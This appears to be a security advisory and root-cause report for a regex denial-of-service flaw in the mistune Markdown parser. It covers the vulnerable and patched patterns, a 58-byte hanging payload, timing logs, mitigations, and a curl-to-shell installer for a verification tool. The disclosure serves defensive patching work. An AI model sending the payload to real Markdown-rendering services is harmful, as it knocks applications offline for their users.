Mistune: ReDoS via catastrophic backtracking in LINK_TITLE_RE
What's the vulnerability?
mistune's LINK_TITLE_RE regular expression contains overlapping
alternatives inside a repeated group: an escaped-punctuation branch and a
single-character branch that can also consume a backslash. A sequence such as
\! can therefore be matched either as one escaped token or as two ordinary
characters, and when no overall match exists the engine must try every
combination of these choices.
A Markdown document whose link title contains a run of repeated \! sequences
and no closing quote drives this catastrophic backtracking. The matching cost
is roughly exponential in the number of \! pairs, so a tiny document (58
bytes) stalls the renderer for more than five seconds in the reproduction
below, and each additional pair roughly doubles that time.
Any code that renders attacker-supplied Markdown through mistune (user
comments, document uploads, etc.) is exposed to a denial-of-service.
Root Cause Analysis
# RCA Report: CVE-2026-33079 — Mistune ReDoS in LINK_TITLE_RE
## Summary
The `mistune` Markdown parser (versions 3.0.0a1 through 3.2.0) contains a Regular-expression Denial of Service (ReDoS) vulnerability in the `LINK_TITLE_RE` regular expression used during inline link parsing. The regex contains overlapping alternatives inside a repeated group: an escaped-punctuation branch (`\\` + `PUNCTUATION`) and a single-character branch (`[^"\x00]`). For input sequences such as `\!`, the regex engine can match the sequence either as one escaped-punctuation token or as two single-character tokens, leading to exponential backtracking when no closing quote is found. A crafted 58-byte Markdown document containing a link title with repeated backslash-escaped exclamation marks and no closing quote causes the renderer to hang for multiple seconds, enabling denial-of-service against any application that renders attacker-controlled Markdown.
## Impact
- **Package**: `mistune` (PyPI)
- **Repository**: https://github.com/lepture/mistune
- **Affected versions**: `3.0.0a1` through `3.2.0`
- **Fixed version**: `3.2.1`
- **CVE**: CVE-2026-33079
- **Advisory**: GHSA-8mp2-v27r-99xp
- **CWE**: CWE-1333 (Inefficient Regular Expression Complexity)
- **Severity**: High (CVSS 8.7)
- **Consequences**: Any code path that renders user-supplied Markdown through `mistune` (e.g., blog comments, document uploads, chat messages) can be forced to consume excessive CPU time, causing the application to hang or become unresponsive.
## Root Cause
The vulnerable `LINK_TITLE_RE` regex is defined in `src/mistune/helpers.py`:
```python
LINK_TITLE_RE = re.compile(
r"[ \t\n]+("
r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"|' # "title"
r"'(?:\\" + PUNCTUATION + r"|[^'\x00])*'" # 'title'
r")"
)
```
Inside the repeated group `(?: ... )*`, the two alternatives overlap for certain two-character sequences:
- Alternative A: `\\` + `PUNCTUATION` — matches a backslash followed by any punctuation character (e.g., `\!`)
- Alternative B: `[^"\x00]` — matches any single character except `"` and null (e.g., `\` then `!` as two separate repetitions)
For the sequence `\!`, the regex engine has **two** ways to match it inside the repeated group. For `n` consecutive `\!` sequences, there are `2^n` possible matching paths. When the closing quote is missing, the engine must explore all of these paths before failing, resulting in exponential time complexity.
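The doubling can be observed directly with Python's standard `re` module. The following is a minimal sketch, not part of the original reproduction: it rebuilds the vulnerable pattern from the definition quoted above and times a failed match for growing `n`. `PUNCTUATION` is not shown in the excerpt, so the definition used here (a character class built from `string.punctuation`) is an assumption, and `time_failed_match` is a hypothetical helper name.

```python
import re
import string
import time

# Assumption: PUNCTUATION is a character class covering ASCII punctuation.
# The excerpt above does not show mistune's actual definition.
PUNCTUATION = r"[" + re.escape(string.punctuation) + r"]"

# Vulnerable pattern, copied from the definition quoted above.
VULNERABLE_TITLE_RE = re.compile(
    r"[ \t\n]+("
    r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"|'  # "title"
    r"'(?:\\" + PUNCTUATION + r"|[^'\x00])*'"  # 'title'
    r")"
)


def time_failed_match(n):
    """Match a title holding n escaped "!" and no closing quote.

    Returns (match_object_or_None, elapsed_seconds).
    """
    subject = ' "' + "\\!" * n
    start = time.perf_counter()
    match = VULNERABLE_TITLE_RE.match(subject)
    return match, time.perf_counter() - start


if __name__ == "__main__":
    # n is kept small on purpose: each extra pair roughly doubles the run time.
    for n in range(10, 21, 2):
        match, seconds = time_failed_match(n)
        print(f"n={n:2d} matched={match is not None} seconds={seconds:.4f}")
```

Because `n` advances in steps of two, the elapsed time should grow by roughly a factor of four per printed row if the `2^n` analysis holds. Absolute timings depend on the machine and Python version.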
The fix (released in `mistune==3.2.1`) adds the backslash to the negated character classes, eliminating the overlap:
```python
LINK_TITLE_RE = re.compile(
r"[ \t\n]+("
r'"(?:\\' + PUNCTUATION + r'|[^"\\\x00])*"|'
r"'(?:\\" + PUNCTUATION + r"|[^'\\\x00])*'"
r")"
)
```
With `[^"\\\x00]`, the second alternative can no longer match a bare backslash, so `\!` can only be matched by Alternative A. This removes the exponential branching and reduces complexity to linear.
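As a quick sanity check of this claim, the sketch below compiles the patched pattern as quoted above and runs it against three inputs: the title portion of the 58-byte payload, a well-formed title containing escaped quotes, and a title containing a backslash that is not followed by punctuation. It is an illustration only; `PUNCTUATION` is again an assumed stand-in for mistune's own definition, and the sample strings are made up for this example.

```python
import re
import string

# Assumption: stand-in for mistune's PUNCTUATION character class.
PUNCTUATION = r"[" + re.escape(string.punctuation) + r"]"

# Patched pattern, copied from the definition quoted above.
FIXED_TITLE_RE = re.compile(
    r"[ \t\n]+("
    r'"(?:\\' + PUNCTUATION + r'|[^"\\\x00])*"|'
    r"'(?:\\" + PUNCTUATION + r"|[^'\\\x00])*'"
    r")"
)

# Title portion of the payload: 25 escaped "!" and no closing quote.
unclosed = ' "' + "\\!" * 25 + ")"
# A well-formed title whose inner quotes are backslash-escaped.
closed = ' "a \\"quoted\\" title"'
# A title with a backslash followed by a letter rather than punctuation.
bare_backslash = ' "C:\\temp"'

print(FIXED_TITLE_RE.match(unclosed))         # None, returned without backtracking blow-up
print(FIXED_TITLE_RE.match(closed).group(1))  # "a \"quoted\" title"
print(FIXED_TITLE_RE.match(bare_backslash))   # None
```

The last case follows from the pattern as written: once the single-character branch excludes the backslash, a backslash can only be consumed together with a following punctuation character. Whether that matters in practice depends on how the rest of the parser handles a title that fails to match, which this sketch does not cover.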
**Fix commit range**: `git diff v3.2.0 v3.2.1` in the `lepture/mistune` repository.
## Reproduction Steps
The reproduction is fully automated by `repro/reproduction_steps.sh`.
What the script does:
1. Creates a fresh Python virtual environment.
2. Installs the vulnerable version `mistune==3.2.0`.
3. Renders a crafted 58-byte Markdown payload:
```
[x](y "\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!)
```
This payload contains 25 backslash-escaped exclamation marks inside an unclosed double-quoted link title.
4. Measures wall-clock render time with a 5-second timeout.
5. Installs the fixed version `mistune==3.2.1`.
6. Repeats the timed render.
7. Compares results and writes a JSON verdict.
Expected evidence:
- **Vulnerable (`3.2.0`)**: Render exceeds the 5-second timeout (`RESULT: timeout`, `ELAPSED: ~5.0s`).
- **Fixed (`3.2.1`)**: Render completes in well under the timeout (`RESULT: completed`, `ELAPSED: <0.01s`).
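The contents of `repro/reproduction_steps.sh` are not shown here, so the following is only a sketch of how the timed render in steps 3, 4 and 6 could be written. It runs the render in a child interpreter so that a hung regex match can be killed when the timeout expires. `timed_render`, `PAYLOAD` and `RENDER_SNIPPET` are hypothetical names, and the child interpreter is assumed to have the `mistune` version under test installed.

```python
import subprocess
import sys
import time

# The 58-byte payload from step 3: 25 escaped "!" and no closing quote.
PAYLOAD = '[x](y "' + "\\!" * 25 + ")"

# Code executed in the child interpreter. mistune.html is mistune's
# ready-made HTML renderer; it reads the Markdown text from stdin here.
RENDER_SNIPPET = "import sys, mistune; print(len(mistune.html(sys.stdin.read())))"


def timed_render(payload, timeout=5.0, snippet=RENDER_SNIPPET, python=sys.executable):
    """Run `snippet` in a child interpreter with `payload` on stdin.

    Returns (result, elapsed_seconds), where result is "completed",
    "timeout", or "error" (non-zero exit, e.g. mistune not installed).
    """
    start = time.perf_counter()
    try:
        proc = subprocess.run(
            [python, "-c", snippet],
            input=payload,
            capture_output=True,
            text=True,
            timeout=timeout,  # the child is killed if this expires
        )
    except subprocess.TimeoutExpired:
        return "timeout", time.perf_counter() - start
    result = "completed" if proc.returncode == 0 else "error"
    return result, time.perf_counter() - start
```

Calling `timed_render(PAYLOAD, python=...)` once with the interpreter of each virtual environment would yield the `RESULT` and `ELAPSED` values that the expected evidence describes. A separate process is used because the time is spent inside a single `re` call, which a worker thread in the same interpreter cannot cancel.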
## Evidence
Log files produced by the reproduction script:
- `logs/mistune_3.2.0.log` — vulnerable run
- `logs/mistune_3.2.1.log` — fixed run
Key excerpts:
**Vulnerable (3.2.0)**:
```
RESULT: timeout
ELAPSED: 5.0001s
```
**Fixed (3.2.1)**:
```
RESULT: completed
ELAPSED: 0.0026s
OUTPUT_LENGTH: 46
```
Environment:
- Python 3.x
- `mistune==3.2.0` (vulnerable) and `mistune==3.2.1` (fixed) installed from PyPI
- Wall-clock timeout: 5 seconds
- Payload: 58 ASCII bytes
## Recommendations / Next Steps
- **Upgrade immediately** to `mistune>=3.2.1`. The fix is a small, targeted change that adds `\\` to the two negated character classes in `LINK_TITLE_RE`. Run your existing rendering tests after upgrading to confirm that link titles in your content still parse as expected.
- **Interim mitigation**: If upgrading is not immediately possible, impose a short CPU-time or wall-clock limit on Markdown rendering, for example by rendering in a worker process that can be terminated when it exceeds its budget, or pre-validate link syntax before passing input to `mistune`.
- **Regression testing**: Add a ReDoS regression test to the project’s test suite using the 58-byte payload (or larger variants) to ensure the regex does not regress.
- **General best practice**: For regexes that process untrusted input, avoid overlapping alternatives inside unbounded repeated groups. Consider an engine with linear-time guarantees such as RE2, or statically analyze regexes for catastrophic backtracking. The third-party `regex` package is itself a backtracking engine and offers no such guarantee, although its matching functions accept a `timeout` argument that can bound the damage.
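One way to write such a regression test without risking a hung test runner is to measure how match time grows between two small inputs instead of running the full payload under a timeout. This is a substitute technique, not the method used by the reproduction script. In the sketch below, `build_title_re` builds a simplified stand-in (the double-quoted half of the pattern only), `growth_ratio` is a hypothetical helper, `PUNCTUATION` is an assumed definition, and the threshold of 20 is an arbitrary margin. A real suite would presumably pass the `LINK_TITLE_RE` object from `mistune.helpers` instead.

```python
import re
import string
import timeit

# Assumption: stand-in for mistune's PUNCTUATION character class.
PUNCTUATION = r"[" + re.escape(string.punctuation) + r"]"


def build_title_re(exclude_backslash):
    """Double-quoted half of the title pattern, before or after the fix."""
    other = r'[^"\\\x00]' if exclude_backslash else r'[^"\x00]'
    return re.compile(r'[ \t\n]+"(?:\\' + PUNCTUATION + "|" + other + r')*"')


def growth_ratio(pattern, small=8, large=16):
    """Best-of-three match time for `large` pairs divided by that for `small`."""

    def best(n):
        subject = ' "' + "\\!" * n  # unclosed title with n escaped "!"
        timings = timeit.repeat(lambda: pattern.match(subject), number=10, repeat=3)
        return min(timings)

    return best(large) / best(small)


def test_link_title_growth_is_not_exponential():
    # Exponential backtracking would give a ratio near 2 ** (16 - 8) = 256,
    # while linear matching gives a ratio near 2.
    assert growth_ratio(build_title_re(exclude_backslash=True)) < 20
```

Keeping both inputs small bounds the worst-case run time even if the vulnerable pattern is reintroduced, at the cost of relying on timing measurements, so the margin may need tuning on noisy CI machines.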
## Additional Notes
- **Idempotency**: The reproduction script was run twice consecutively and produced consistent results both times.
- **Payload size**: The payload is deliberately small (58 bytes) to demonstrate that even tiny attacker inputs can trigger the hang.
- **No external services required**: The vulnerability is triggered entirely in-process; no network, browser, or database is needed for reproduction.
- **Limitations**: The timeout value (5s) was chosen to clearly distinguish the vulnerable behavior from the fixed behavior. On much faster hardware the vulnerable render could finish inside the timeout, in which case the timeout should be lowered or the payload lengthened by a few `\!` pairs. The exponential gap ensures the distinction remains obvious.
Verify with pruva-verify
Run the Pruva CLI to automatically fetch and execute the reproduction script.
pruva-verify REPRO-2026-00148
pruva-verify GHSA-8mp2-v27r-99xp
pruva-verify CVE-2026-33079
Install the CLI:
curl -fsSL https://pruva.dev/install.sh | sh
Or Run Manually
Download the script
curl -O https://pruva.dev/api/v1/reproductions/REPRO-2026-00148/artifacts/reproduction_steps.sh
Make executable
chmod +x reproduction_steps.sh
Run the script
./reproduction_steps.sh